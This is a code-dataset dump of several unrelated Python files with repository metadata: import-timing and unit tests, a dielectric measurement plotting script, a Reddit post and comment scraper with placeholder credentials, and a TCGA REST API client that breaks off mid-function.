mooti-barry/funboost
|
2cd9530e2c4e5a52fc921070d243d402adbc3a0e
|
[
"Apache-2.0"
] | 38
|
2020-04-24T01:47:51.000Z
|
2021-12-20T07:22:15.000Z
|
test_frame/other_tests/test_import_time.py
|
mooti-barry/funboost
|
2cd9530e2c4e5a52fc921070d243d402adbc3a0e
|
[
"Apache-2.0"
] | 84
|
2019-08-09T11:51:14.000Z
|
2022-03-02T06:29:09.000Z
|
import datetime
print(1,datetime.datetime.now())
import apscheduler
print(2,datetime.datetime.now())
import gevent
print(3,datetime.datetime.now())
import eventlet
print(4,datetime.datetime.now())
import asyncio
print(5,datetime.datetime.now())
import threading
print(6,datetime.datetime.now())
import pymongo
print(7,datetime.datetime.now())
import redis
print(8,datetime.datetime.now())
import pysnooper
print(9,datetime.datetime.now())
| 16
| 32
| 0.779018
| 63
| 448
| 5.539683
| 0.333333
| 0.412607
| 0.489971
| 0.573066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021845
| 0.080357
| 448
| 28
| 33
| 16
| 0.825243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
f1d2893fa115eecb78df0e1f60881f2cba36b30d
| 1,151
|
py
|
Python
|
tests/test_unit/test_api_prefixes.py
|
WinaZar/restdoctor
|
2ea2db69228e5425805a2b17160f54cda077aa46
|
[
"MIT"
] | 20
|
2020-09-28T17:54:26.000Z
|
2022-02-16T21:35:09.000Z
|
tests/test_unit/test_api_prefixes.py
|
WinaZar/restdoctor
|
2ea2db69228e5425805a2b17160f54cda077aa46
|
[
"MIT"
] | 32
|
2020-10-04T17:26:31.000Z
|
2022-03-29T01:19:14.000Z
|
tests/test_unit/test_api_prefixes.py
|
pashaandsik/restdoctor
|
2465039729b31420518ac0f047dd289d8c84dfa3
|
[
"MIT"
] | 19
|
2020-10-01T16:54:14.000Z
|
2022-01-18T14:41:53.000Z
|
import pytest
from restdoctor.utils.api_prefix import get_api_prefixes, get_api_path_prefixes
@pytest.mark.parametrize(
'api_prefixes,default,expected_result',
(
('/prefix', None, ('/prefix',)),
(('/prefix',), None, ('/prefix',)),
(None, None, ()),
(None, '/prefix', ('/prefix',)),
(('/prefix1', '/prefix2'), None, ('/prefix1', '/prefix2')),
),
)
def test_get_api_prefixes_success_case(api_prefixes, default, expected_result, settings):
settings.API_PREFIXES = api_prefixes
result = get_api_prefixes(default=default)
assert result == expected_result
@pytest.mark.parametrize(
'api_prefixes,default,expected_result',
(
('/prefix', None, ('prefix/',)),
(('/prefix',), None, ('prefix/',)),
(None, None, ()),
(None, '/prefix', ('prefix/',)),
(('/prefix1', '/prefix2'), None, ('prefix1/', 'prefix2/')),
),
)
def test_get_api_path_prefixes_success_case(api_prefixes, default, expected_result, settings):
settings.API_PREFIXES = api_prefixes
result = get_api_path_prefixes(default=default)
assert result == expected_result
| 30.289474
| 94
| 0.632493
| 121
| 1,151
| 5.719008
| 0.198347
| 0.174855
| 0.130058
| 0.150289
| 0.875723
| 0.875723
| 0.875723
| 0.736994
| 0.736994
| 0.736994
| 0
| 0.008556
| 0.187663
| 1,151
| 37
| 95
| 31.108108
| 0.731551
| 0
| 0
| 0.4
| 0
| 0
| 0.191138
| 0.062554
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f1e50045e62fd9cb5dc74f5b0c6f1656b7b9e524
| 6,331
|
py
|
Python
|
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 23:41:29 2021
"""
from PyOECP import References
from PyOECP import Transform
import matplotlib.pyplot as plt
import numpy as np
''' Example 1 Methanol
This script tries to convert the reflection coefficients from VNAs.
The data files and VNAs are as follows.
VNA
Short: LS11Short.csv
Open: LS11Open.csv
Acetone: LS11Acetone.csv
Water: LS11Water.csv
Methanol: LS11Methanol.csv
'''
''' 1.1 Low Frequency Data '''
T = 25
address = 'data/low/'
S11r0 = References.Parser(address + 'S11Short.csv')
S11r1 = References.Parser(address + 'S11Open.csv')
S11r2 = References.Parser(address + 'S11Water.csv')
S11r3 = References.Parser(address + 'S11Acetone.csv')
S11m = References.Parser(address + 'S11Methanol.csv')
frequency = S11r1[:,0]
TransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r2,S11r3,
m2='Open',m3='Water_Kaatze',m4='Acetone_Onimisi',temperature=T,
Window=81,concentrations=[None,None,None,None])
MarslandE = TransformModel.Calculate()
spacing = 10
TransformModel1 = Transform.Stuchly(frequency,S11m,S11r0,S11r1,S11r2,
m1='Short',m2='Open',m3='Water_Kaatze',Window=51)
StuchlyE = TransformModel1.Calculate()
Komarov = Transform.Komarov(frequency, S11m, S11r1, S11r2, S11r3,
'Open','Water_Kaatze','Acetone_Onimisi',
1,3.8,2.1+0*1j,M=50,Window=51)
KomarovE = Komarov.epsilon
fig, (ax1,ax2) = plt.subplots(2,1)
fig.set_size_inches((5,8))
fig.set_dpi(300)
font = {'size':15}
plt.rc('font', **font)
plt.rcParams['font.family'] = 'serif'
'''Let's visualize the data.'''
ax1.semilogx(frequency[::spacing],np.real(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Marsland)")
ax1.semilogx(frequency[::spacing],-np.imag(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Marsland)")
ax1.semilogx(frequency[::spacing],np.real(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax1.semilogx(frequency[::spacing],-np.imag(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax1.semilogx(frequency[::spacing],np.real(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
ax1.semilogx(frequency[::spacing],-np.imag(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
Theoretical = References.Methanol_Barthel(frequency,temperature=T)['epsilon']
ax1.semilogx(frequency,np.real(Theoretical),color='red',linewidth=1.0,label="$\epsilon'$ (Literature)")
ax1.semilogx(frequency,-np.imag(Theoretical),'--',color='blue',linewidth=1.0,label="$\epsilon''$ (Literature)")
ax1.set_ylabel("$\epsilon$")
ax1.set_ylim([0,50])
ax1.legend(loc='upper right', ncol=2, fontsize='xx-small',edgecolor='k')
ax1.text(-0.25,1,'(a)',transform=ax1.transAxes)
''' 1.2 High Frequency Data '''
address = 'data/high/'
S11r0 = References.Parser(address + 'S11Short.csv')
S11r1 = References.Parser(address + 'S11Open.csv')
S11r2 = References.Parser(address + 'S11Water.csv')
S11r3 = References.Parser(address + 'S11Acetone.csv')
S11m = References.Parser(address + 'S11Methanol.csv')
frequency = S11r1[:,0]
TransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r2,S11r3,
m2='Open',m3='Water_Kaatze',m4='Acetone_Onimisi',temperature=T,
Window=101,concentrations=[None,None,None,None])
MarslandE = TransformModel.Calculate()
spacing = 10
TransformModel1 = Transform.Stuchly(frequency,S11m,S11r0,S11r1,S11r2,
m1='Short',m2='Open',m3='Water_Kaatze',Window=51)
StuchlyE = TransformModel1.Calculate()
Komarov = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r2,
'Open','Acetone_Onimisi','Water_Kaatze',
0.3,0.8,2.1+0*1j,M=50,Window=51)
KomarovE = Komarov.epsilon
Theoretical = References.Methanol_Barthel(frequency,temperature=T)['epsilon']
'''Let's visualize the data.'''
ax2.semilogx(frequency[::spacing],np.real(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Marsland)")
ax2.semilogx(frequency[::spacing],-np.imag(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Marsland)")
ax2.semilogx(frequency[::spacing],np.real(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax2.semilogx(frequency[::spacing],-np.imag(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax2.semilogx(frequency[::spacing],np.real(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
ax2.semilogx(frequency[::spacing],-np.imag(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
ax2.semilogx(frequency,np.real(Theoretical),color='red',linewidth=1.0,label="$\epsilon'$ (Literature)")
ax2.semilogx(frequency,-np.imag(Theoretical),'--',color='blue',linewidth=1.0,label="$\epsilon''$ (Literature)")
ax2.set_xlabel("frequency [Hz]")
ax2.set_ylabel("$\epsilon$")
ax2.set_ylim([0,50])
ax2.legend(loc='upper right', ncol=2, fontsize='xx-small',edgecolor='k')
ax2.text(-0.25,1,'(b)',transform=ax2.transAxes)
plt.savefig('Figure3.pdf',dpi=300)
| 40.324841
| 111
| 0.664508
| 741
| 6,331
| 5.650472
| 0.215924
| 0.008598
| 0.068784
| 0.074516
| 0.812276
| 0.802723
| 0.800573
| 0.797707
| 0.767136
| 0.767136
| 0
| 0.058548
| 0.155584
| 6,331
| 156
| 112
| 40.583333
| 0.724654
| 0.012478
| 0
| 0.534653
| 0
| 0
| 0.156495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039604
| 0
| 0.039604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7b0e3abd8ec4265cabc886de2a3a6af99fb501d2
| 124
|
py
|
Python
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | 2
|
2019-01-20T14:15:54.000Z
|
2019-07-13T17:20:32.000Z
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | 12
|
2019-05-07T09:27:34.000Z
|
2019-06-04T12:36:41.000Z
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | null | null | null |
# Provide a way to visualiez relationships between currency/pairs etc.
# TODO : check networkx
from .basic_term import plot
| 31
| 70
| 0.798387
| 18
| 124
| 5.444444
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153226
| 124
| 4
| 71
| 31
| 0.933333
| 0.725806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7b3330e9e211c942a307690d85810b771b9e9b68
| 81
|
py
|
Python
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 92
|
2017-03-22T07:27:21.000Z
|
2021-04-04T06:59:26.000Z
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 1
|
2017-03-22T10:57:27.000Z
|
2017-03-22T10:57:33.000Z
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 7
|
2017-03-22T07:27:25.000Z
|
2020-04-28T08:44:03.000Z
|
from .core.engine import CrawlerEngine
from .core.crawler import CrawlerProcess
| 20.25
| 40
| 0.839506
| 10
| 81
| 6.8
| 0.7
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 81
| 3
| 41
| 27
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9e6a98bc6061481650f87e4c0ae2e06ff686b485
| 242
|
py
|
Python
|
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
tests/unit_tests/test_collection.py
|
RussTheAerialist/render_engine
|
426184c652bf5d2f812656f195e8b89827af33ff
|
[
"MIT"
] | null | null | null |
import pytest
def test_collection_kwargs_become_properties(base_collection):
assert base_collection.custom_val == 'custom'
def test_collection_sorts_alphabetically(base_collection):
assert base_collection.pages[0].slug == 'Title_C'
| 30.25
| 62
| 0.822314
| 31
| 242
| 6
| 0.612903
| 0.301075
| 0.182796
| 0.258065
| 0.365591
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 7
| 63
| 34.571429
| 0.848624
| 0
| 0
| 0
| 0
| 0
| 0.053719
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
7bac70b30b235bf7335957569d572d7df7d5ad44
| 103
|
py
|
Python
|
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | 1
|
2022-02-01T18:50:12.000Z
|
2022-02-01T18:50:12.000Z
|
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
sdk/ml/azure-ai-ml/tests/test_configs/deployments/endpoint_scoring/do_nothing.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
def init() -> None:
pass
def run(raw_data: list) -> list:
return [{"result": "Hello World"}]
| 17.166667
| 39
| 0.572816
| 14
| 103
| 4.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.23301
| 103
| 5
| 40
| 20.6
| 0.734177
| 0
| 0
| 0
| 0
| 0
| 0.165049
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.25
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
c876b0e70e2e3c1ce010ed45e6815b0f52c846d7
| 9,688
|
py
|
Python
|
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | 1
|
2021-05-04T14:12:06.000Z
|
2021-05-04T14:12:06.000Z
|
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | null | null | null |
scrape_reddit.py
|
JJWilliams27/Reddit_NLP
|
1a38804cfb2d99ff118cfc427c6cf03fc1ac0249
|
[
"MIT"
] | null | null | null |
'''
Extract posts from a specified subreddit, and extract all comments from each post
Author: Josh Williams
Date: 18/06/2019
Update: 18/06/2019
'''
# Import Modules
import praw
from psaw import PushshiftAPI
import pandas as pd
import datetime as dt
import os
# Options
save_posts = 1
save_comments = 1
get_top_submissions = 0
get_all_submissions = 1
get_comments_for_timeseries = 0
get_submissions_for_timeseries = 0
# All Posts
start_epoch = int(dt.datetime(2008, 1, 1).timestamp()) # Set start point for post extraction
number_of_submissions = None # Set number of posts (None = all posts)
# Create Functions
def get_date(created):
return dt.datetime.fromtimestamp(created)
# Set up Reddit API
reddit = praw.Reddit(client_id='INSERT_CLIENT_ID_HERE', \
client_secret='INSERT_CLIENT_SECRET_HERE', \
user_agent='INSERT_USER_AGENT_HERE', \
username='INSERT_USERNAME_HERE', \
password='INSERT_PASSWORD HERE')
api = PushshiftAPI(reddit) # Use Pushshift API to get around 1000 submission limit imposed by praw
# Access Climate Skepticism Subreddit
subreddit = reddit.subreddit('ClimateSkeptics')
# Loop through top submissions and append to output dataframe
if get_top_submissions == 1:
# Create Output Dictionary
topics_dict = { "title":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"created": [], \
"body":[]}
# Access Top x posts
print("Retrieving Submissions")
top_subreddit = subreddit.top(limit=500)
print("Appending Submissions to Dataframe")
count = 0
for submission in top_subreddit:
print(count)
path = os.getcwd()
conversedict = {}
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
submission.comments.replace_more(limit=None)
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["created"].append(submission.created)
topics_dict["body"].append(submission.selftext)
temp_array = []
for comment in submission.comments.list():
temp_array.append(comment)
if comment.id not in conversedict:
comment.created = get_date(comment.created)
conversedict[comment.id] = [comment.body,comment.ups,comment.created,{}] # Original = [comment.body,{}]
if comment.parent() != submission.id:
parent = str(comment.parent())
conversedict[parent][3][comment.id] = [comment.ups, comment.body, comment.created]
#conversedict[comment.id] = [comment.body,{}]
#if comment.parent() != submission.id:
# parent = str(comment.parent())
# pdb.set_trace()
# conversedict[parent][1][comment.id] = [comment.ups, comment.body]
converse_df = pd.DataFrame(conversedict)
count = count+1
if save_comments == 1:
converse_df.to_csv('%s' %(outname), index=False)
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert Date to Timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%sTop500Posts_Test.csv' %(subreddit), index=False)
if get_all_submissions == 1:
years=[2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019]
total_posts = []
for year in years:
print('Getting Submissions for %s' %(year))
start_epoch = int(dt.datetime(year, 1, 1).timestamp()) # Set start point for post extraction
end_epoch = int(dt.datetime(year,12,31).timestamp()) # Set end point
# Create Output Dictionary
topics_dict = { "title":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"created": [], \
"body":[]}
# Access Top x posts
print("Retrieving Submissions")
all_subreddit = list(api.search_submissions(before=end_epoch,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
total_posts.append(len(all_subreddit))
print("Appending Submissions to Dataframe")
count = 1
num = len(all_subreddit)
for submission in all_subreddit:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
conversedict = {}
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["created"].append(submission.created)
topics_dict["body"].append(submission.selftext)
temp_array = []
for comment in submission.comments.list():
temp_array.append(comment)
if comment.id not in conversedict:
try:
conversedict[comment.id] = [comment.body,comment.ups,comment.created,{}] # Original = [comment.body,{}]
if comment.parent() != submission.id:
parent = str(comment.parent())
conversedict[parent][3][comment.id] = [comment.ups, comment.body, comment.created]
#conversedict[comment.id] = [comment.body,{}]
#if comment.parent() != submission.id:
# parent = str(comment.parent())
# pdb.set_trace()
# conversedict[parent][1][comment.id] = [comment.ups, comment.body]
except:
pass # Skip if no comments
converse_df = pd.DataFrame(conversedict)
count = count+1
if save_comments == 1:
converse_df.to_csv('%s' %(outname), index=False)
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert Date to Timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%sAllPosts' %(subreddit) + str(year) + '.csv', index=False)
if get_comments_for_timeseries == 1:
# Create Output Dictionary
topics_dict = { "created":[], \
"score":[], \
"id":[], \
"body": []}
searches = ['IPCC','AR4','AR5'] # Kirilenko et al 2015 use climate change and global warming as search terms
for search in searches:
# Access Top x posts
print("Retrieving Submissions")
all_subreddit_comments = list(api.search_comments(q=search,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
print("Appending Comments to Dataframe")
count = 0
num = len(all_subreddit_comments)
for submission in all_subreddit_comments:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
topics_dict["created"].append(submission.created)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["body"].append(submission.body)
count = count+1
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert Date to Timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%s_IPCC_Comments.csv' %(subreddit), index=False)
if get_submissions_for_timeseries == 1:
# Create Output Dictionary
topics_dict = { "created":[], \
"score":[], \
"id":[], "url":[], \
"comms_num": [], \
"title": [], \
"body":[]}
searches = ['IPCC','AR4','AR5'] # Kirilenko et al 2015 use climate change and global warming as search terms
for search in searches:
# Access Top x posts
print("Retrieving Submissions")
all_subreddit = list(api.search_submissions(q=search,after=start_epoch,subreddit=subreddit,filter=['url','author','title','subreddit'],limit=number_of_submissions))
print("Appending Submissions to Dataframe")
count = 0
num = len(all_subreddit)
for submission in all_subreddit:
print(str(count) + '/' + str(num))
path = os.getcwd()
dirname = path + '/Comments'
if not os.path.exists(dirname):
os.mkdir(dirname)
outname = dirname + '/' + submission.id + '.csv'
# Remove limit on comment extraction
topics_dict["created"].append(submission.created)
topics_dict["title"].append(submission.title)
topics_dict["score"].append(submission.score)
topics_dict["id"].append(submission.id)
topics_dict["url"].append(submission.url)
topics_dict["comms_num"].append(submission.num_comments)
topics_dict["body"].append(submission.selftext)
count = count+1
# Convert Dictionary to Pandas Dataframe
print("Creating Dataframe")
topics_data = pd.DataFrame(topics_dict)
# Convert Date to Timestamp
_timestamp = topics_data["created"].apply(get_date)
topics_data = topics_data.assign(timestamp = _timestamp)
# Export as CSV
if save_posts == 1:
print("Saving as csv")
topics_data.to_csv('%s_IPCC_Posts.csv' %(subreddit), index=False)
| 34.848921
| 174
| 0.678881
| 1,209
| 9,688
| 5.294458
| 0.150538
| 0.051554
| 0.019997
| 0.017497
| 0.780191
| 0.759881
| 0.740509
| 0.730042
| 0.721918
| 0.709108
| 0
| 0.01598
| 0.186107
| 9,688
| 278
| 175
| 34.848921
| 0.795815
| 0.1859
| 0
| 0.713542
| 0
| 0
| 0.126804
| 0.011493
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005208
| false
| 0.010417
| 0.026042
| 0.005208
| 0.036458
| 0.109375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c87a1f174274f929d9f9e63497b398bcebed36a5
| 4,913
|
py
|
Python
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 10
|
2020-05-26T07:29:14.000Z
|
2021-12-06T21:33:40.000Z
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 1
|
2021-10-05T12:25:30.000Z
|
2021-10-05T17:05:56.000Z
|
BioClients/tcga/Utils.py
|
jeremyjyang/BioClients
|
b78ab2b948c79616fed080112e31d383346bec58
|
[
"CC0-1.0"
] | 2
|
2021-03-16T03:20:24.000Z
|
2021-08-08T20:17:10.000Z
|
#!/usr/bin/env python3
"""
Utility functions for TCGA REST API.
"""
import sys,os,re,json,time,logging
from ..util import rest
#
##############################################################################
def ListProjects(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/projects?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
projects = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for project in projects:
logging.debug(json.dumps(project, indent=2))
if not tags:
tags = list(project.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(project[tag]) if tag in project else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %d"%(n_out, total))
##############################################################################
def ListCases(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
url_next = (base_url+'/cases?from={0}&size={1}'.format(from_next, size))
rval = rest.Utils.GetURL(url_next, parse_json=True)
cases = rval["data"]["hits"] if "data" in rval and "hits" in rval["data"] else []
for case in cases:
logging.debug(json.dumps(case, indent=2))
if not tags:
tags = list(case.keys())
fout.write("\t".join(tags)+"\n")
vals = [(str(case[tag]) if tag in case else "") for tag in tags]
fout.write("\t".join(vals)+"\n")
n_out+=1
if n_out>=nmax: break
if n_out>=nmax: break
total = rval["data"]["pagination"]["total"] if "data" in rval and "pagination" in rval["data"] and "total" in rval["data"]["pagination"] else None
count = rval["data"]["pagination"]["count"] if "data" in rval and "pagination" in rval["data"] and "count" in rval["data"]["pagination"] else None
if not count or count<size: break
from_next += count
logging.info("n_out: %d / %d"%(n_out, total))
##############################################################################
def ListFiles(base_url, skip, nmax, fout):
n_out=0; tags=None;
from_next=skip; size=100;
while True:
